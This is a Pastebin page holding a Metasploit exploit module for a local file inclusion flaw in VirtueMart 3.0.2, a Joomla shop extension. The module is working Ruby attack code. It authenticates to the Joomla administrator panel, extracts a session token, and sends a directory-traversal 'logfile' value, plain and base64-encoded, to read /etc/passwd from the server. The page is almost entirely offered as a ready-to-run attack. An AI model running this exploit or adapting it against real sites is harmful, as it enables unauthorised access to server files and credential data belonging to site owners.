daily pastebin goal
67%
SHARE
TWEET

VirtueMart 3.0.2 LFI poc exploit

a guest Jan 13th, 2015 277 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ##
  2. # This module requires Metasploit: http//metasploit.com/download
  3. # Current source: https://github.com/rapid7/metasploit-framework
  4. ##
  5.  
  6. require 'msf/core'
  7.  
  8. class Metasploit4 < Msf::Exploit::Remote
  9.   Rank = ExcellentRanking
  10.  
  11.   include Msf::Exploit::Remote::HttpClient
  12.  
  13.   def initialize(info = {})
  14.     super(update_info(info,
  15.       'Name' => 'VirtueMart 3 - LFI poc for authenticated users',
  16.         'Description' => %q{
  17.                 VirtueMart 3.0.2 is vulnerable to local file include attack.
  18.                 Authenticated user can read local files from the server.
  19.  
  20.                 More here: https://twitter.com/HauntITBlog
  21.       },
  22.       'Author' =>
  23.         [
  24.           'HauntIT Blog', # Discovery
  25.                                                   # MSF module (based on http://hauntit.blogspot.com/2015/01/en-hikashop-lfi-metasploit-module.html)
  26.           'http://hauntit.blogspot.com'
  27.         ],
  28.       'License' => MSF_LICENSE,
  29.       'Privileged' => false,
  30.       'Platform'   => ['php'],
  31.       'Arch'       => ARCH_PHP,
  32.       'Targets' =>
  33.         [
  34.           [ 'Automatic', { } ],
  35.         ],
  36.       'DefaultTarget'  => 0,
  37.       'DisclosureDate' => ' 23.12.2014'))
  38.       register_options(
  39.       [
  40.         OptString.new('TARGETURI', [ true, "Base Joomla directory path", 'joomla']),
  41.         OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']),
  42.         OptString.new('PASSWORD', [ false, "Password to authenticate with", 'admin']),
  43.         OptRegexp.new('READFILE', [ false, 'Full path to file you want to read', '../etc/passwd'] ),
  44.       ], self.class)
  45.     end
  46.  
  47.   def check
  48.   end
  49.  
  50.   def fetchMd5(my_string)
  51.     if my_string  =~ /([0-9a-fA-F]{32})/
  52.       return $1
  53.     end
  54.     return nil
  55.   end
  56.  
  57.  
  58.   def exploit
  59.     # 1st, we will get cookies and token
  60.     req1 = send_request_cgi({
  61.         'method'        => 'GET',
  62.         'uri'           => normalize_uri(target_uri.path,'administrator','index.php')
  63.     })
  64.     cookies = req1['set-cookie']
  65.     if not req1
  66.       fail_with("[-] Failed with 1st request")
  67.     end
  68.  
  69.     print_status("[+] Good: " + req1.code.to_s)
  70.     print_good("[+] Got cookie(s): " + cookies)
  71.  
  72.     token_pattern = /(<input type=\"hidden\" name=\"[a-zA-Z0-9]*\" value=\"1\")/
  73.    if req1.body =~ token_pattern
  74.      token = fetchMd5(req1.body)
  75.      print_good("[+] Got token: "+ token.to_s)
  76.    else
  77.      print_status("[-] Token not found")
  78.    end
  79.  
  80.  
  81.    # now we need to do auth using that token and cookies
  82.    print_status("[+] Trying to auth...")
  83.  
  84.    auth = send_request_cgi({
  85.        'method'        => 'POST',
  86.        'uri'           => normalize_uri(target_uri.path,'administrator','index.php'),
  87.        'cookie'        => cookies,
  88.        'vars_post'     => {
  89.                'username'      => datastore['USERNAME'],
  90.                'passwd'        => datastore['PASSWORD'],
  91.                'option'        => 'com_login',
  92.                'task'          => 'login',
  93.                'return'        => 'aW5kZXgucGhwP29wdGlvbj1jb21fdmlydHVlbWFydCZ2aWV3PWxvZyZ0YXNrPWVkaXQmbG9nZmlsZT0uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dk',
  94.                token.to_s => 1
  95.      }
  96.    })
  97.  
  98.    print_good("[+] Code after auth: " + auth.code.to_s)
  99.  
  100.  
  101.    # 3rd step: get + post params to lfi
  102.    print_good('[+] Exploit...')
  103.    readthis =  "../../../../../../../../../../../../../../../../../../etc/passwd"
  104.  
  105.    xpl = send_request_cgi({
  106.        'method'        => 'GET',
  107.        'uri'           => normalize_uri(target_uri.path,'administrator','index.php'),
  108.        'vars_get'      => {
  109.                 'option'   => 'com_virtuemart',
  110.                 'view'  => 'log',
  111.                 'task'  => 'edit',
  112.                 'logfile'    => readthis
  113.        },
  114.        'cookie'        => cookies
  115.    })
  116.  
  117.    if xpl
  118.      print_good("[+] Exploit response code: " + xpl.code.to_s)
  119.      print_good("[+] Response body after attack:")
  120.      print_status(xpl.body)
  121.    else
  122.      fail_with("[-] Cannot exploit it :C")
  123.    end
  124.  end # exploit
  125.  
  126. end
RAW Paste Data
Top